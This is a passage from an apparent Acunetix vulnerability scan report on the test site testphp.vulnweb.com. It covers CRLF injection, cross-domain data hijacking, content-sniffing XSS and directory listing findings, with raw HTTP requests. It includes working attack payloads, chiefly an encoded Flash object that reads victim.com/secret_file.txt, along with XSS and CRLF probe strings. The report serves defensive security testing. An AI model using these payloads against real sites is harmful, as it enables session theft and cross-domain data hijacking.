href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> |©2004 Acunetix Ltd </div> <br> </div></body><!-- InstanceEnd --></html>
GET /index.bak HTTP/1.1
Range: bytes=0-99999
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Request headers
92Acunetix Website Audit
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/index.zip
Details
This file was found using the pattern ${fileName}.zip.Original filename: index.phpSource code pattern found: <?PHP require_once("database_connect.php"); ?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false"--><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --><title>Home of WASP Art</title><!-- InstanceEndEditable --><link rel="stylesheet" href="style.css" type="text/css"><!-- InstanceBeginEditable name="headers_rgn" --><!-- here goes headers headers --><!-- InstanceEndEditable --><script language="JavaScript" type="text/JavaScript"><!--function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();}MM_reloadPage(true);//--></script> </head><body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"><div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6> <div id="globalNav"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> </div> </div> <!-- end masthead --> <!-- begin content --><!-- InstanceBeginEditable name="content_rgn" --><div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for WASP.</h3> </div></div><!-- InstanceEndEditable --><!--end content --> <div id="navBar"> <div id="search"> <form action="search.php" method="post"> <label>search art</label>
93Acunetix Website Audit
<input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p><img src="images/add.jpg" alt="" width="107" height="66"></p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> |©2004 Acunetix Ltd </div> <br> </div></body><!-- InstanceEnd --></html>
GET /index.zip HTTP/1.1
Range: bytes=0-99999
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
94Acunetix Website Audit
CRLF injection/HTTP response splitting (verified)
MediumSeverity
ValidationType
Scripting (CRLF_Injection.script)Reported by module
Description
This script is possibly vulnerable to CRLF injection attacks. HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user inputis injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTPheaders structure.HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cachepoisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). Theattacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted bythe target as two HTTP responses instead of one response.
Impact
Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookiesor HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.
Recommendation
You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent theinjection of custom HTTP headers.
References
Acunetix CRLF Injection Attack
Introduction to HTTP Response Splitting
Whitepaper - HTTP Response Splitting
Affected items
/redir.php
Details
URL encoded GET input r was set to ACUSTART ACUENDAdditional details: Source file: /hj/var/www//redir.php line: 3
GET /redir.php?r=ACUSTART%0d%0aACUEND HTTP/1.1
Acunetix-Aspect-Password: *****
Acunetix-Aspect: enabled
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
95Acunetix Website Audit
Cross domain data hijacking
MediumSeverity
ConfigurationType
Scripting (XSS.script)Reported by module
Description
This page is possibly vulnerable to Cross domain data hijacking. If an attacker can create/upload a malicious Flash(SWF) file or control the top part of any page he can perform an attack known as Cross domain data hijacking. TheContent-Type of the response doesn't matter. If the file is embedded using an <object> tag, it will be executed as a Flashfile as long as the content of the file looks like a valid Flash file. Here is the attack scenario: - An attacker creates a malicious Flash (SWF) file- The attacker changes the file extension to JPG- The attacker uploads the file to victim.com- The attacker embeds the file on attacker.com using an tag with type "application/x-shockwave-flash"- The victim visits attacker.com, loads the file as embedded with the tag- The attacker can now send and receive arbitrary requests to victim.com using the victims session- The attacker sends a request to victim.com and extracts the CSRF token from the response There are many ways to perform this attack. The attacker doesn't need to upload a file. The only requirement is that anattacker can control the data on a location of the target domain. One way is to abuse a JSONP API. Usually, the attackercan control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses anentire Flash file as callback, we can use it just like we would use an uploaded file in this attack. A payload could look like this: <object style="height:1px;width:1px;"data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always"flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>
Impact
An attacker can read any secrets (such as CSRF tokens) from the affected domain.
Recommendation
For file uploads: It is recommended to check the file's content to have the correct header and format. If possible, use"Content-Disposition: attachment; filename=Filename.Extension;" header for the files that do not need to be served in theweb browser. Isolating the domain of the uploaded files is also a good solution as long as the crossdomain.xml file of themain website does not include the isolated domain. For other cases: For JSONP abuses or other cases when the attacker control the top part of the page, you need toperform proper input filtering to protect against this type of issues.
References
Cross Domain Data Hijacking
The pitfalls of allowing file uploads on your website
Affected items
/hpp/params.php
96Acunetix Website Audit
Details
URL encoded GET input p was set toCWS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/ ... (line truncated)
(line truncated)
...S%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8b
F%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f
2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%
dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%2
6%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/[%dcm{%ef%cb
%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09&pp=12 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/hpp/params.php
Details
URL encoded GET input p was set toCWS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/ ... (line truncated)
(line truncated)
...WS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8
bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%
f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"
%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%
26%1c%9f5%20h%f1%d1g%0f%14%c1%0a]s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d[%17%f3/[%dcm{%ef%c
b%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09&pp=1 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
97Acunetix Website Audit
Cross site scripting (content-sniffing)
MediumSeverity
ValidationType
Scripting (XSS.script)Reported by module
Description
This type of XSS can only be triggered on (and affects) content sniffing browsers.This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user inorder to gather data from them. An attacker can steal the session cookie and take over the account, impersonating theuser. It is also possible to modify the content of the page presented to the user.
Recommendation
Your script should filter metacharacters from user input.
References
XSS Filter Evasion Cheat Sheet
OWASP Cross Site Scripting
How To: Prevent Cross-Site Scripting in ASP.NET
OWASP PHP Top 5
Acunetix Cross Site Scripting Attack
The Cross Site Scripting Faq
VIDEO: How Cross-Site Scripting (XSS) Works
Cross site scripting
Affected items
/showimage.php
Details
URL encoded GET input file was set to 1'"()&%<acx><ScRiPt >7CQV(9897)</ScRiPt>
GET /showimage.php?file=1'"()%26%25<acx><ScRiPt%20>7CQV(9897)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/showimage.php
Details
URL encoded GET input file was set to ./pictures/4.jpg'"()&%<acx><ScRiPt >xGEL(9315)</ScRiPt>
GET
/showimage.php?file=./pictures/4.jpg'"()%26%25<acx><ScRiPt%20>xGEL(9315)</ScRiPt>&size=1
60 HTTP/1.1
Referer: http://testphp.vulnweb.com:80/
Request headers
98Acunetix Website Audit
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
99Acunetix Website Audit
Directory listing
MediumSeverity
InformationType
Scripting (Directory_Listing.script)Reported by module
Description
The web server is configured to display the list of files contained in this directory. This is not recommended because thedirectory may contain files that are not normally exposed through links on the web site.
Impact
A user can view a list of all files from this directory possibly exposing sensitive information.
Recommendation
You should make sure the directory does not contain sensitive information or you may want to restrict directory listingsfrom the web server configuration.
References
Directory Listing and Information Disclosure
Affected items
/.idea
Details
Pattern found: <title>Index of /.idea/</title>
GET /.idea/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/.idea/scopes
Details
Pattern found: <title>Index of /.idea/scopes/</title>
GET /.idea/scopes/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Request headers
100Acunetix Website Audit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/_mmServerScripts
Details
Pattern found: <title>Index of /_mmServerScripts/</title>
GET /_mmServerScripts/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/admin
Details
Pattern found: <title>Index of /admin/</title>
GET /admin/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Connections
Details
Pattern found: <title>Index of /Connections/</title>
GET /Connections/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Request headers
101Acunetix Website Audit
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/CVS
Details
Pattern found: <title>Index of /CVS/</title>
GET /CVS/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Flash
Details
Pattern found: <title>Index of /Flash/</title>
GET /Flash/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Flash/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/images
Details
Pattern found: <title>Index of /images/</title>
GET /images/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/images/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
102Acunetix Website Audit
Accept: */*
/Mod_Rewrite_Shop/images
Details
Pattern found: <title>Index of /Mod_Rewrite_Shop/images/</title>
GET /Mod_Rewrite_Shop/images/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/pictures
Details
Pattern found: <title>Index of /pictures/</title>
GET /pictures/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/Templates
Details
Pattern found: <title>Index of /Templates/</title>
GET /Templates/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Templates/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/wvstests
103Acunetix Website Audit
Details
Pattern found: <title>Index of /wvstests/</title>
GET /wvstests/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/wvstests/pmwiki_2_1_19
Details
Pattern found: <title>Index of /wvstests/pmwiki_2_1_19/</title>
GET /wvstests/pmwiki_2_1_19/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
